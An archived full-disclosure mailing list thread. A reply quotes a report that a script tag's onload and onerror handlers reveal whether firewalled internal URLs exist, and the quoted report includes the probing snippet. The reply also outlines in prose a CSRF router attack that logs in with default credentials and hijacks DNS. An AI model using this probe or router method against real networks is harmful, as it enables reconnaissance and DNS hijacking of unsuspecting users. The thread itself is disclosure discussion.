[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] Checking existence of firewalled URLs via javascript's script.onload
From: Jonathan Gregson via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2023-04-21 21:19:09
Message-ID: MW4PR22MB34336F7FBD0274BC2618CB37C7609 () MW4PR22MB3433 ! namprd22 ! prod ! outlook ! com
[Download RAW message or body]
Hi Georgi,
As you suggested, this is a CSRF attack. Using such techniques to attack or enumerate local \
applications has been known for some time and is a very difficult issue to address. Browsers \
have done well in preventing malicious _authenticated_ cross-site requests, but as you've \
found, attackers can still use such techniques for enumeration and information gathering.
Fortunately, it's not very practical except in targeted attacks, either against known victims \
or known applications that the victim might be running. It takes several thousand or even \
millions of requests to enumerate an internal network in this way, and the user will likely \
close your tab before you can discover anything meaningful (the clever ones will use a popunder \
to increase scan time).
One of the more impactful ways to abuse local applications through CSRF is to attack the \
router. Many (most?) users leave router credentials and IP addresses set to factory defaults. \
When victims visit the attacker's website, the website POSTs the default username and password \
to the router's default IP address which logs the user into the router. The malicious website \
then makes a second POST request setting the router's DNS servers to malicious servers, \
resulting in a DNS hijack. Vulnerable routers can be exploited in the same way, sometimes \
leading to the attacker taking full control of the router and enlisting it in a botnet.
Just some things to think about.
Thanks,
Jonathan
-----Original Message-----
From: Fulldisclosure <fulldisclosure-bounces@seclists.org> On Behalf Of Georgi Guninski
Sent: Wednesday, April 19, 2023 05:50
To: fulldisclosure@seclists.org
Subject: [FD] Checking existence of firewalled URLs via javascript's script.onload
There is minor information disclosure vulnerability similar
to nmap in browser.
It is possible to check the existence of firewalled URL U via
the following javascript in a browser:
<script src="U"
onload="alert('Exists')"
onerror="alert('Does not exist')">
This might have privacy implication on potentially
"semi-blind CSRF" (XXX does this makes sense?).
Works for me in Firefox, Chrome and Chromium 112.
I believe the issue won't be fixed because it will break
stuff in the mess called internet.
For online test:
https://www.guninski.com/onload2.html
--
guninski: https://j.ludost.net/resumegg.pdf
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic